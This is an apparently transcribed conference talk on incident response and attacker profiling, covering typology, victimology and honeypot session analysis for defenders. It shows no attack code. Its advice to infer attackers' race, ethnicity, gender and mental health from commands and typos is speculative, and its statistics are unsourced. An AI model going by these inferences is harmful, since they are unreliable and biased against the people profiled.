 Hello. Good morning everybody. This morning's talk is going to cover analyzing intrusions in intruders. It's kind of a deeper look at network incident response, intrusion analysis. Okay, so this presentation is significantly changed from the one on your CD, but I've already provided this to DEF CON last night, so it'll be on the website after my talk sometime today, hopefully. Who am I? I'm Sean Bodmer. I'm a computer science, criminal science researcher. I've spent a lot of time researching honey nets over the last six years. I'm not an expert behavioral profiler, nor do I work for the Department of Justice or have any background within specifically. Intrusion analysts by trade spend the first few years in doing penetration testing, exploit analysis, signature generation, FIDSs, IPSs, and the last six years specifically dealing with incident response, intrusion analysis, and honey nets. And I'm also building a thesis on attacker and threat profiling. Why am I here? I'd like to convey some concepts and methods that you all can hopefully walk away with and better protect your networks and better understand threats that are actively coming against your network. So basically this whole talk is going to cover the silence of the lamb meets the silence of the ram, in a sense. Okay, so everybody's challenged, right? How do you better understand the threats? You get hacked, you have an incident occur on your network. How do you understand what the motive and intent is? How can you take that information when you understand it and better use that information to put in stronger protections in your network? How do you effectively communicate what just happened on your network to your leadership? How are they going to give you more budget? How are they going to allocate you more resources to increase the security protections or training? Overall foundations of this talk is going to basically be founded in behavioral profiling. Yes, it has negative connotations in the media and the press, but it's been used for a very long time and very successfully. I think statistically it's like 70, 72% on average behavioral profiling does work. It's not 100%, it's not the silver bullet, but it does work. You can use this to analyze patterns of an attack, focus on the behavior, the skills and abilities. You can look at the code that's being used against your network and see if it's custom, if it's not. Motivation, what are they going after? Your finance information, your logistics, operational, corporate espionage, complexity of the attack, how hard was it, accessibility to the resources. This is the foundation I'm going to build on from here. I'm going to bring you all the way back about 100 years ago, 1888, Jack the Ripper, this is where behavioral profiling started. First case profiling was actively used. Without even ever finding Jack the Ripper, they were able to build a list of a profile of Jack. There's still today nobody really knows who he was, but they infer a lot of personality traits about Jack the Ripper. They have all his victims, they have the dates, circumstances of death, and how they were harmed. You can relate all this information to your network. What happened? What OSes did they hit? What services? What tools were dropped? What files were altered? What was taken? What presence was left? From an intrusion analyst perspective, you can relate all this information that's already there to what you're doing on a day-to-day basis. You can develop patterns and signatures of an attack if you can write your own custom host-based signatures. Okay, so with Jack the Ripper, they never found him, right? But they have a lot of suspects, right? They have all these plots. The royal plot, he was a doctor. How the bodies were mutilated. Some say he was, some say he wasn't. It's a still ongoing debate. Jack the Ripper's crimes were disorganized. Some of them thought that it was a passion. Organization, knowledge of your environment. So did he know the streets where he was murdering, committing his crimes? Does your intruder, who's hacking your network, does he seem to know exactly where your systems are? Does he know where your users are, where your files are stored, where your key assets are located, if you have a very large enterprise? Also, is he extremely skilled with tools? What kind of tools is he using? Stuff from open source, or is he customizing his own tools? That can help you build off that profile of Jack, right? This is kind of an overall basic profile of Jack. I pulled it from several different sources right here. So you look at Jack and you see, okay, there's all these assumptions about Jack the Ripper. You can make the same assumptions about your attacker. Try to narrow it down. And it's all at least trying to understand your threat. Are you dealing with some kids? Are you dealing with organized crime? Somebody who's a disgruntled employee or something even worse? So like I said, there's over 100 years of this experience right now that you can use as information security professionals. You can go on the internet and read. You can go buy books. You can research to your head turns blue. That information that's already been built, and the Department of Justice folks, the law enforcement types, you all, this is not new to you. You all have been doing this for decades over a century. And so this is all really for the security guys, network guys who don't really think about this stuff or haven't, and where you can walk away and put this into your program. So now the information systems are at a point where all the heavy lifting is done by your automated systems, your security systems. It leaves you time to do the heavy thinking, right? Well, you can implement that a little bit better with recursive learning, whether it be AI, automatic signature generation, managed security services, groups, and on-site contractors, right? So there's different ways that you can kind of build up in certain areas to help take all the leverage, all of your time, instead of worrying about all the logs, you can filter it all with different tools that are commercially available. All right, so get a little scientific, criminal investigative analysis. Yep, you can go on Wiki, you can go on the Internet and read all about it. That's not something that you specifically do, but it's a good resource that you can go read about and walk away with, right? The basis of it is reviewing crimes from a behavioral aspect, assessing the facts about what happened and interpreting what the attacker did. So what you see happen, if it's a very clean and organized attack, if it's very disorganized and seems slightly opportunistic, then it gives you two different types of threat profiles. Law enforcement is a pull-off of law enforcement code. A person's basic behavior, exhibit in a crime scene, it's also present in their normal lives. You can infer that any way you want to. But it will help you determine, especially if you're working in commercial space, it gives you the ability to see what's going on in your attack and go back out and do research on your attacker. Sometimes in code that you do, if you reverse it and go through the email addresses, IP addresses, specific keywords that you can go back and find a hacker group website or somebody's MySpace account that has all their information on just by finding a keyword in the code, right? And that right there allows you to better understand what is coming at you. Okay, so again, we'll technical threat analysis, threat modeling. This has been around for several years. So common components, you look at potential attacks, weighs in the threats of your network and the risk, right? So if it says vulnerability, risk, people's threat, whatever. Analysis, you start to look at what's going on in your network, what's trending, what's happened, and then what you can do to counter-measure that. What kind of measures you can implement in the future is stronger protections, which lead to future preparations. A common analysis approach, locate vulnerabilities, classify possible attackers. So if you're running a bank or financial system, who could possibly want to get into your network and take your information, whatever it may be? Identify the goals of an attacker. Okay, so you know your valuables and then you say, okay, well, these groups of people may want to get into my systems. You look at your vulnerabilities and say, okay, these are the ways that they could get in and you try to safeguard those as much as you can. And then create a resolution plan. If this happens, I know to go look at these systems. I know these are my weak points, right? And everybody always looks at the users as your weakest link. So people have looked at criminal science and people have looked at computer science. It's basically two separate worlds. And right now, I see a lot of IT information security personnel that I work with and I work for and consult to. They do a lot of post-mortem analysis, right? Something happened and they respond to that. They're not actively looking right now and keeping on track and understanding what's going on. They wait for something to happen. They pull the hard drive. They review it. They go through their logs, but it's already happened. So there's no way to, you know, how do you respond to that? Your data is already gone. You're already toast. So it is possible to be a little proactive about it and implement these other sciences into your security program to make you a little more proactive. So you're not always responding to something. You're actually doing something so when something happens, you're significantly more prepared. Behavioral profiling yet, negative connotation, but it can define one aspect of understanding your threats and understanding attackers that want to do you harm. Okay, so it's here. It's now. You know, my humble opinion, everybody, at some level you have thought about this, who wants to break into my network, who wants to do me harm, but there's really a lot of resources that you can go read about to help you better understand it. I have an entire bookshelf full of criminal, several books on criminal profiling, criminal sciences, and UK studies that has helped me relate a lot of intrusions that I've seen into, you know, from these serial murders and criminal case studies, really how they found them, how they identified it, how they enumerated who did it, right? Attribution. So you can create, you know, models of this. You can create go-by programs to help build stronger models depending on what kind of network you're, or enterprise you're working with. And you can understand, if you understand that, you understand your threats, you can understand where you may be going next, where the attackers may be going. The latest threats, okay, you know, this new exploit came out, okay, I have six servers that have this vulnerability. Yeah, I can patch it. How fast can you patch it before they hit you? And how much of a threat, how large and strong is the threat? How fast are they going to respond to that zero-date that just came out? Okay, so this, you can be Colombo now. You can sit here on your network and think about things that, you know, when the power goes out and you're all alone, it'll keep you up at night. So when you do an intrusion analysis, you can guess about what happened, you can try to put pieces together and make a lot of assumptions, or you can really look at all the facts, bring all your data sources together, and try to really peel away the needles in the haystack and put them all together, okay, you know, this pattern happened over the network. If you have some session-based monitoring tools, you can look at the session of what happened and kind of tie it all together, and it should be this one attack, to maybe this one attempt was the same person over here in these five other places, right? So you start to build this big story on your network. Okay, so here, this is a sample, you know, cybercom investigation, you know, intrusion investigation, you know, so you assess the scene, you can collect your evidence, put all your data sources together, document, document, please. Analyze what happened, you know, network forensics, host-based forensics, you know, reversing most of the code, whatever, you know, whatever tools you use. Assessment, right? So you see what happened over the network, over the host. You put it all together, and then you just try to build a profile, a threat profile, an attacker profile of the intruder or the group that just came at your network. And then you try to generate an intrusion report that has all this combined information in it and give it to your senior leadership to let them know how big of a threat just came at their network, whether it was some kid just using some tool he downloaded, or this is something serious, or, you know, I need, you know, more tools. I need, you know, we need to call the police, get a lawyer, you know, get, you know, whoever involved to better support what just happened, especially if you're a large financial institution. Okay, here's a sample investigative life cycle which we'll run through really quick. All right, so you have your incident, you know, awareness consultation right when the incident occurs, preliminary analysis, you know, image acquisition, recovery, you do analysis on it. Preliminary and final report. And either you're going to go to prosecutable or non-prosecutable. You know, even if you go prosecutable you still have the bottom containment and prevention for the future. They still kind of go hand in hand. And, you know, if you end up in a prosecution, you know, I swear to tell the truth nothing but the truth and that's an entertaining end of itself. So where do you start, right? So an incident occurs and you have all this data, right? We've talked about how you can do, you know, behavioral profiling and intruder analysis, but when it comes down to it, you have all of these components of technology that you have to wrap your head around when something happens. Where do I start, right? Do I look for, you know, the hard drive to look at the apps, the network logs, the hard drives? What do I do first, right? And it's all around what just happened the body of the crime. So you have all this to go through and it's very inundating to figure out where you want to go. So I'm going to go through a couple of case studies throughout this, okay? Haale, Mojave, Mahart, El Griton, Julio, Ardita. So this is all open source information, right? This is a hacker who broken into some government organizations, colleges and some foreign countries. So he did some very nasty things, right? So, but bottom line, you know, they charge them at the very bottom for years probation, you know, had to pay some fines. Nothing too big, right? But when you look at this and you're watching this, if you were on that assessment team, right, trying to do the incident response, how would you have handled that? How would you have looked at the difficulty of his code? Consider the target, what he was going after, what systems he was hitting, where the data points were that he took the data. What was the outcome, okay? So did he take your financial information? Logistics? Did he take personnel records? PII, whatever you want to call it. What did he take and what does it all mean to you? How much did that damage your day-to-day functions, right? And how would you analyze that? Typology is basically typecasting or stereotyping certain groups together, you know, like the naive hacker, the organized crime, and I actually have a list of a few slides down. And victimology is basically looking at what servers he hit. You know, actually looking at the victim, the target, and trying to assess, okay, so what was the value of that target that he just went after? You know, you can look up the definitions on Wiki. And there are other methods you can use, you know, just using standard digital media analysis and trying to do some kind of incident response reporting, a damage assessment. But attacker characterization is very important when you try to do this assessment, right? So attacker characterization has two primary components, events and threats. So what has occurred by the act of the attacker and then the threat, the motives and intent of the attack, right? So generally, session data isn't available on an attack. You're looking at some, you know, some fuzzed up host logs. You're looking at some network logs, IDS logs, firewall logs that have more than likely been fuzzed. You know, somebody throws a lot of noise on the firewall to pass an IDS and tries to slip by, goes really low and slow and tries to throw a really slow fragmented attacks. You know, it could be, depending on how important you are as a target. Okay, so honey net technologies, if they're available and you use them, you know, and if you don't publish them, okay, so general consensus is that yeah, everyone's like honey net, you know, bad connotations as well. But if you use them and implement them inside your network and don't advertise them publicly, you can use them, right? It gets kind of shady when you go for prosecutable the prosecutable path. Work with your corporate attorney, oh man, but you don't have to, if you're not going to do prosecution, you just want to do, you know, protection, you can implement honey pots until your heart's content. Okay, so these are the common, we need to talk about typology and breaking your threats down into groups. Here's a, just a, the groups that we use internally for analysis team. And you see, it goes a lot down from naive, a novice to foreign intelligence, which, you know, depending on what kind of information you're protecting, it can go all the way there. Components of an attacker profile that you can start building, and we actually have, you know, some broken out forms that we use. First hour information, we try to fill all this stuff out. You have motivation, objectives, timelines, resources, risk tolerance, skills and methods, actions, attack organization points, numbers involved in the attack. You may see one attack, but it could be several people involved in that attack. One person scans, one person actually injects, one person runs the shell, one person gets in and pulls the data, one person cleans up. That can happen. It can be one person from cradle to grave, soup to nuts, you know? A knowledge source, right? When I say knowledge source, that again refers to if you're, you can have the ability to find out, you know, an email address an IP address, a keyword that you can go Google or, you know, search for on the internet and find out more about that person or that group. And you can figure, okay, what are they about? Do they hate, you know, my company? Is it a former employee? Is it, you know, group working to do, you know, money laundering or, you know, they want to sell my information on, you know, IRC, whatever it may be. But that's a good information source is trying to go out and try to find information about that entity or person. Common challenges in attacker attack characterization, the cost. How do you really effectively, you know, convey that to your leadership? Hey, you know, we need this amount of money, you know, in addition to just making sure that the operation is going to have, you know, all this, you know, threat modeling, attacker characterization, all these extra sensors out and running. You know, the personnel, skilled talent to do analysis on the information, equipment, software, productivity, you know, most organizations, they really, they don't want to be inundated with all this, you know, other, you know, additional work that you have to do, this workload, especially IS staff. We have a lot to do on a day-to-day, you know, function. Why are we going to spend this extra, you know, two or three hours doing all this analysis and all this, all extra logs? Well, you can automate a lot of it. And technology, you know, how do you know where to put the equipment, you know, boundary protections, the continuity of operations of that equipment, you know, I mean, you have, you know, depending on what kind of guidelines you're operating under, Sarbanes, Oxley, HIPAA, you know, do you have to store that data? Do you have to have extra backups of that? And what happens when you have, you know, disaster recovery? Is your leadership going to let you have a whole other hot site or cold site for that? You know, and legal. Most lawyers get really tense and pucker up when you talk about, you know, setting up, you know, any kind of extra attacker characterization or kind of profiling systems. That depends on how you word it. So, we talked a lot, you know, about implementing the technology, about the concepts of actually performing the work, when you're actually doing the analysis, you want to trace an attack to the insertion point. In your first hour, when you find out something's happened, you try to find the best, you know, that point of entry, right, and try to trace it back because that first device, like, you know, most ISPs, what they dump their data in 24 hours, so you have 24, 48 hours to find out where that attack came from before all your data's gone. But that data, you know, even though of course IP doesn't mean too much, it still helps you understand what might be happening and, you know, how, what, who, when, why, and where, you know, it's a big piece of the pie. Acquiring all of your internal assets. If you run a major enterprise, it's across, you know, several countries or, you know, several states across the country, how do you get all those pieces together really quick, you know, before the logs are erased or before something's damaged, or that attacker as he's getting out of your network, you know, you don't have access to site, whatever it may be, and they're deleting those logs when you're finding out in your Philadelphia office that, oh, you know, something just happened. So getting all that information together really quick and storing it, then that's really important. Postmortem is reactive and not proactive. If you're not implementing technologies to actively monitor, you know, the anomalous behavior, you know, you're fighting a never-ending battle. It's completely uphill and you're just going to fall down. Datastream, Calboy and Koogee, okay, so 26 days of attacks, 20 days of monitoring. A lot of sniffers. So look at the overall damage and that's the damage just to the computer systems. That doesn't cover the costs associated with the time, right, to take all the personnel to rebuild all those systems. The information lost as with case study B, right, there's a defined, you know, monetary number with all that. That hasn't, you know, ever totaled. If you looked at that and you were trying to define, you know, how bad is this stress? So think you're all on the receiving end of this and you find out there's all these sniffers loaded on your network. There's all this data going out of your network. Okay, the tools that are running on your network, how good is the code? You know, is it very common? Again, is it open source? Common tools. Who would you consider the target? How would you consider it, right? Would you look at what just happened to you and try to figure out, okay, so what does this all mean? Are they taking like, if I'm building like an airplane, are they taking, you know, different pieces of it from different sites to all take it back and build a nice plane for themselves because they're starting up their own airline? Could you look at the typology and victimology, put them together and assess the situation? Could you look at, okay, so I think that this information is highly valuable and it could end up on the black market or in another country or, you know, specifically the black market and look at your target, your victim. What does this all mean to me? What service did they take? Again, you know, what applications, what files with information. So giving you a kind of a light run-through of when you see an intrusion, how would you kind of look at it, right? So you have this information and of your attacker and this is how, what I actually use to build, you know, profiles of after an intrusion. This is what I do on a day-to-day basis. Gender, content analysis, you know, can you see inside the code? Can you look on the internet and see what, you know, if this is a male, female, can you do research on that? I said on the internet, aged, older, younger, you know, middle-aged. Command use, keystroke use, if they're using some really old commands, you know, Windows, Unix, you can infer that they're older, younger. There's things like that that you can use. Sometimes, you know, people can be aware that you're doing that and throw you off with some, you know, to be a young person using older commands. They can do things like that. Typology, methodology, content analysis, looking at the p-cap of the attack, what actually happened in the flows. Race, ethnicity, can you tell if they're from a foreign country? Can you tell if they're local? What region of the country they're from? What part of the world they're from? You can do that. What's this one? Talk about command use and keystroke use, and that's related to honey nets and honey pots. So, you can also do level of intelligence and schooling. How well educated are they? Is your attacker? And that can also mean you can infer from the level of intelligence and schooling what kind of threat you're up against, right? What kind of, who wants to do you harm? Whether this person is highly funded and well educated, you really don't find highly, highly, highly educated people doing, I mean, you know, masters, PhDs, I'm referring to, doing a lot of major hacking. I mean, you find some people doing it, but as far as doing cross-organizational intrusions, unless they're highly funded, PhDs are masters normally at work. Political affiliations, you know, are they extremist group? Are they with some, you know, environmentalist group? Whatever it may be, there's, you know, you can identify that, potentially, by going out and doing, you know, research on the internet, looking at content analysis, you know, what's going on. External data sources, if you find out that somebody else has been attacked by the same entity, by the same group, you can kind of put your heads together and go, okay, well, we think, because our two organizations have these, you know, functions that it could be this kind of group coming after both of us. Physical mental health, we've all seen the movie Swordfish, right? So, you know, the guys like, you know, hacking this bank or I'm going to shoot you, same type of thing, you know, don't know if you've ever seen that before, but it can happen. And you can also see are they narcissistic, do they have any kind of, you know, manic depressive, bipolar disorders, you know, what are their patterns of attack? So, you want to construct your assessment, you know, you do your triage of the initial incident, your case overview, and your victimology, and you look at the attack. History hotspots, nature of the information targeted, you know, again, victim system functionality. Vulnerability exploits, is there any disclosure history on the internet about that attack, or that attack or disclosing the attacks? M.O., motor stop brawn dye, motor operations, signature, content, patterns. Can you look at any of that, any attack, and can you correlate it across multiples? Utilization of the access. So, how often, when they got into your network, did they use it? Did they get in for a few minutes and just back away? Did they get in, and were they so comfortable on your network that they found other user accounts, logged in to other users as users, you know, overnight for hours and hours and hours, logged in to multiple locations and just took all kinds of data and, you know, wove it out of your network. How do you look at that, right? How well? And the data transfer technique, did they just FTP it out, did they SCP it out, did they use one of encrypted, you know, channel out, you know, and that can help you infer the skill level and motive and intent of your attacker. Logging alteration, you know, deletion techniques, did they modify the host at all? Did they take care to cover their tracks or did they not? How brazen were they that you can, you know, sort of build this information about your attacker, right? It's a little profile. So you're going to analyze session behaviors. Did I copy this one? No, I think I did. Okay, so if there's session data available, you can look at the knowledge of that attacker of your environment. System locations, right, system functionalities, if it knew where it was on that, you know, VLAN, it knew that that was the mail server, it knew that this was the backup file server. If you have a major enterprise and you have your own proprietary naming convention, right, how well were they in your network and how were that entity before they got in your system? Then they know exactly where to go or do they have to putz around for a little while and do some, you know, net views or whatever to get in the system. They know exactly what folders and files without doing any greps or direct researches, right? Exactly that your vice president was, you know, in that office, in that state or in that network. Whether you attack to the scripted or not and how often does the attack generate typos. So, like, let's say, you have a fat finger and you always mess up Q and you're always having to, you know, backspace and delete that. If you have session analysis or session analysis systems, you can really look at all that data and really build a good understanding of your, you know, attacker. Okay, so implementing session analysis, you know, again, honey nets, honey pots. So, I'm going to show you a few sessions that we've collected and they've all been scrubbed, but this information has been involved in a couple of things that I've worked on. So, I don't think you can see this too well, but it's on your CD and I've kind of cleaned up some of the text on the CD. It took out some of the MySQL statements. But, basically, you see the person, you know, I peek and fig, look at another box and went down systematically and went through look at the domain, directory to some tools, TFTP to some stuff out, you know, echoed pulling stuff out to a file, right? Outputting all this information from the server to a file, took out the file, renamed his tool to, a nice tool, went down, panked some other system, did some discovery and some other systems on the network and knew exactly where to go copying some of these files in, right? So, bang. How often did this attacker really dig around and look for a whole bunch of systems, right? This actually happened very fast, about a half an hour's time. So, this person, this entity, knew exactly where to go and just testing to make sure some systems were up and logged in. But it was very quick, very fast, highly educated, you know, don't know about the resources of that entity, but it was very fast, highly educated, they knew exactly where to go. So, but you can see that they went down, found some passwords on the local system and kept digging, burying deeper and deeper in, right? Found some passwords, looked at some more systems, copied over some more files and some other systems. So, you can see they're just pulling out the data, pulling it out, pulling it out, right? Very fast. So, after you look at this, right, and this is actually about six pages printed out of a honeypot capture, how would you have analyzed or evaluated the attack, right? You can look at the network data and you can look at the signatures created and kind of put them together and then say, okay, here's the session data and match all that up and build a very good profile and understanding of your attacker. Was it sophisticated, motivated, targeted, opportunistic, organized, disorganized, it's a good criminal science term and then automated a lot. Was it scripted? Did somebody prepare all this? Did somebody prepare this kind of information, this attack very quickly? You have to have an extreme knowledge, a very deep knowledge of your internal network, your day-to-day operations. Okay, honeypot capture two. Okay, so basically the person, this is kind of a pudge around on a DMZ. Somebody was looking around for something. So, we see that they're just kind of digging around, looking for something and they're not really doing too much. They're just trying to do some discovery and it's not that very long of a capture. Two and a half pages. So, you can see and I will say that I actually messed up on this one when I set up my honeypot and actually left the, in the recent documents, link I left, the little cvac.zip file in there, so they discovered it pretty quick. So, don't do that. So, they go through and try to dig around the system, dig around for some domains, right? Nothing too fancy, nothing too good, but they did try to pull out some data to an external IP, which is fuzz. And you can see that they tried to make a lot of noise on the network, to pull out the IDS logs. So, you know, not too sophisticated. Somebody's poking around for an empty box to pivot off of. You know, like I said, not too sophisticated, motivated, and they never came back after that. It wasn't very, it looked like opportunistic, not really targeted, because that IP or that presence really hadn't scanned like that or hid that service on that honeypot before. Automated, it was live. There was a live person digging around that network. They just kind of faux pas like that, and made those typos. So, session capture three, this is actually much shorter, but you can look at it. Somebody's just digging around, looking at a domain that they just tried to get into. And this was a web server domain, and hit a server, tried to look for some documents, recent documents on the system, tried to do some other some good queries, and made a lot of noise on the network. But it wasn't very sophisticated. No. You look around, and they left after a while. And this right here was about an hour of digging around. Session capture two was about an hour and a half. So it wasn't on, they never came back, they never did anything more with this system. So when it's sophisticated, wasn't very motivated, because they never came back, that presence never hit that honeypot again. Didn't really seem targeted. They were kind of wildly searching, they weren't searching for anything specific. Seemed kind of disorganized. They didn't know exactly where they were going, what they were going after, and it was live, all the typos. So Carlos Smac, Salgado. So here's another hacker, ended up with a large fine, two and a half years in federal prison, made about $200,000 in sale credit cards. So if you're an online financial company, you have threats like this every day, you can go on the Internet and IRC Underground, find all kinds of credit cards, you can buy every day for $1, $10. So if you had been a part of this on the financial side, trying to figure out what was going on in your network, how would you consider the difficulty of what he was doing? Did all this information was easily accessible? Maybe a few security controls in place? Would you consider the target? Very easy to get. So this is financially based. Is it financially motivated? You can sit at the outcome, you can watch me hold my credit card information, so you can deduce, it's probably going to end up on the underground Internet, so you can probably get on another box and try to get off on the open Internet and try to find your credit cards or any of those numbers out there fishing around. Typology, what type would you have mixed them in? Of all those common attacker types that I threw out there. That financial data that was out, you can look at that and e-processing server, all my credit card data was stolen, what app did he get through. You can put that information together for your official report. I can't go over all the theory. I mentioned some tools. In your toolkit, in my toolkit, we use network IDSs, host-based IDSs, firewalls, antivirus, router logs, honey pots, honey nets, host-based analysis and system event logs. You'd be surprised how many attackers, as you forget to delete certain web logs, certain event logs when they're trying to cover their tracks. In order to catch someone crafty, you need to be crafty. Honey pots and honey nets. How many attackers really expect you to deploy a few honey pots outside your network? Not many, right? I know in the past few years it's gotten more and more prominent and people are starting to look for them. Not as many as they used to. They still don't look for them. I rarely ever see any honey pot that I've helped set up, look over their shoulder and try to dig for a honey pot. Except for that one time, because I was stupid enough to leave it in the recent documents folder. Security of resource lies and your ability to be able to use it. You want to make your honey pot look as close to your current environment as possible. Host name, naming convention, user names, take some fake data, some used data from your network and dump it on that box. When they're doing that directory grep search, they can find the docs and spreadsheets and PowerPoints and any kind of recent temporary internet files. Make it look a little realistic. That's a huge thing. If an attacker gets on your honey pot and sees nothing within the first five minutes, it's right here because every box in the network has a whole bunch of data in it. So you really have to make it do something. So honey pots, advantages. You can collect a small amount of data for only what hits it, but everything that comes to it, you can infer it's completely malicious or suspicious. Reduces your false positive rates and helps you correlate looking through all the haystack. All you see is needles in a honey pot. That's all you see. I'm seeing this here and looking across your entire enterprise really quick and go, where else am I seeing this? And you can go back and say, have I seen this a week ago? A month ago? A year ago? If you have logs that long, see how low and slow is this person. Catch new attacks. Works encrypted. IPv6 environments. Easily. Simple concept requiring minimal resources depending on how you deploy them. Disadvantages. Limited field of view. If you set it up incorrectly, they can use your honey pot to attack the rest of your systems or other companies or other countries, whatever it may be. Automation isn't perfect, but if you put some resources into it and buy some commercial tools, it works out a little better. Many types available. High interaction honey pots, which are full blown systems. They don't scale too well, but requires a lot of resources, including host based analysis, network analysis on full blown systems. Low interaction systems, they can scale very, very well, but their specific purpose and most of these low interaction honey pots, they don't trick an attacker to actually get in the system. It's just for scanning and early warnings of a network. So here's a few screenshots of actually the RU OS, which is the latest version of the iteration and you can see, this is all sample that was pulled off the open off Google images, but basically you can see the attacks, the times, process IDs of actually what occurred, the directories, what the person is doing. So all those keystrokes that I showed you would be in the bottom of this window and you can easily look at really quick, okay, so what's going on? What process is he using? Where did he come in? You can look at the information that we do a lot of. You can sit there and correlate the time, the event, source IP address, destination, and custom signatures. The signatures related to it build you a network profile of your attacker and then you go look at the host base part of it and even your production systems, not even your honey pots, and you can match up and the event logs with the honey pots session capture and go, okay, so he's doing all these things where she or that entity is doing these things. Okay, so you can infer that what's going on here and you can try to see the skill and intent. Again, this is another one. What I want to talk about, a person at the bottom here, you see a delete, delete, delete, delete, right? So that person just kept trying to, so if they have a fat finger and keep hitting Q, that's also a pattern in the signature that you can put on somebody right there. Here's another one, so process. So most of us have tools, when you do pen testing, you go into a system and you have your first few things that you do. You check the environment of the box. You try to set your own environment, set your own shell, however you try to play with it. But you always go through some specific services that you want to get to, right? Some commands you kick off, and you can kind of infer that, hey, honeypot A and honeypot B, there's some relation here to how this person behave. These two attacks are completely different. Different entities, different personalities, different methods, different modes, right? They jump from one to the other. So here goes some nerd stuff. I'm going to start with trans, sorry. So you can spend more time analyzing attacks and spend more time performing analysis on these intrusions, right? Just don't rebuild your hard drive and keep going. I know most senior leadership, they want you to take out that hard drive, rebuild it, smack it back in, and just keep marching on, right? They don't care about what happened, they just want to check that box day-to-day operations, bring that money in. But that's not going to keep the threat out. Just keep it persistent. You can perform yourself victimology and typology on the attacks, which will help you have a better understanding of what you're up against, and what kind of protections you need to implement. You can build a profile of the incident. You may see crossover. If you build a profile or an incident report with a profile of every incident that occurs, you can easily, one day, advance across other events. Okay, so these five right here may have been the same group or same person and sort of correlating that and helping the community better understand what this one hacker group, how they behave and how they act. And use the lessons learned to add stronger policy, to add better signatures to your network, to implement better countermeasures at your weak points, at your shop spots. Professional recommendations, execution, you're definitely going to want photos. You can't decide to create a chain of custody. If you already performed any kind of analysis steps on any of your production assets that were hit, think before you act, please. If you're working in prosecuting intrusion and get your lawyer involved, your corporate attorney, you can always describe every detail possible and as much depth as you can. You never know when it'll be important. You never know when you're doing your analysis, when you're writing down a detail, you get to some other systems it may pop up like, oh, yeah, that was important over here. And then you actually put two and two together and you get five. Take more time to study non-cyber-based case studies. It helps you relate the methods and how they were able to find the criminal, how they were able to relate it back. Sometimes you can relate that to IT security. Document everything. In short, attempt to better understand your threats on your network. What may actually be a value to anyone that wants to do you harm. Define your assets and valuables. You can do a whole risk management, risk assessment of your network. Study non-cyber-based, mention that and increase your ability to correlate with more events across your network. You never know if these two client side hits, these emails, phishing emails, if they were both going to the same entity, the same organization, document everything because it can all leave back. When you study more non-cyber-based case studies, cyber crimes, cyber criminals, there's a ton of them on the internet that are published now because there's enough of us that have been caught. Serial murders, habitual offenders, there's all kinds of data sources on the internet that you can learn, you can research and find out some usual habitual methods that these guys fall prey to. And they help provide understanding of the resources they may use when you start looking at an attacker, start looking at the tools they may be using against you. You start better understanding how they're getting in, what they're doing, and that helps you understand what you need to do to keep them out and what you need to buy. Keep up to date on the latest security trends. Maintain an active record of your environment. Be aware of your network behavior. Know your network people. I'm saying that none of you do, but I have consulted two groups who have no idea where this system is. The host name, I don't know, I think it's on the fifth floor and it's not even in that city. People who don't know when there's a daily crime job that transfers an R-sync to another database in another site. I didn't know that happened. I didn't know that was something going on. Just please know your network. That'll help you reduce a lot of problems. I added this last night, some of it, so I wanted to be able to give you awesome information to walk away with and do some reading. This is just some of the books that I have. The cyber adversary characterization is really the only good cyber adversary characterization book out there. It's a lot of fluff. It's a lot like the Microsoft press from about 8, 10 years ago, the beginning of some processes that you can use. Then the criminal sciences books. I always talk to lawyers. I talk to law enforcement types. If you're in that type of world, you can reach over and knock on their door or give them a call and say, hey, I want to learn more about this type of criminal sciences kind of study. Where should I go to go learn? They can recommend you go to some certain places. Honeynet.org com. Very, very good resource for criminal sciences, behavioral profiling, offender profiling. Very good resource. Wikipedia, of course. It has several dozen links on each page. Dartmouth University. They have a lot of good stuff too. Yeah, here we go. I'll close this off with some famous dead guy quotes. You can't go anywhere without those these days, right? The first one's very applicable today. I think most of us who are on the defense side and I think some of us here are really close to the second one as well. All right.